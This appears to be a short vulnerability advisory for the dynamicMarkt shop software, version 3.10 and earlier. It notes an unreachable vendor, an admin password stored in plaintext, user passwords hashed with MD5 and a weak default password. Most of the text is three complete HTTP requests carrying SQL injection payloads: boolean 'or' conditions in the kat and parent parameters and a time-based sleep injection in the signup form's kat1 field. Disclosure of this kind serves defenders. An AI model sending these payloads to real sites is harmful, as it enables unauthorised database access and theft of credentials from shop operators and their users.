I was unable to contact the vendor. The homepage returns 500 Internal Server Error for at least 10 month now.
You should know, that the admin backend password is stored in plaintext inside the database! The user passwords are hashed using MD5. dynamicMarkt sets a weak 7 char long password by default.
These vulnerabilities affects dynamicMarkt <= 3.10.
GET /index.php?page=category&topic=offers&do=show&kat=1169231751%20or%202819%3d02819 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: dm_lang=deu
POST /index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: dm_lang=deu
art=kaeufer&kat1=(select*from(select(sleep(20)))a)&Submit=Weiter&page=signup
GET /index.php?page=category&action=&topic=offers&uid=36&oid=&do=shop&art=2&parent=020911029%20or%202590%3d02590&line=neu HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: dm_lang=deu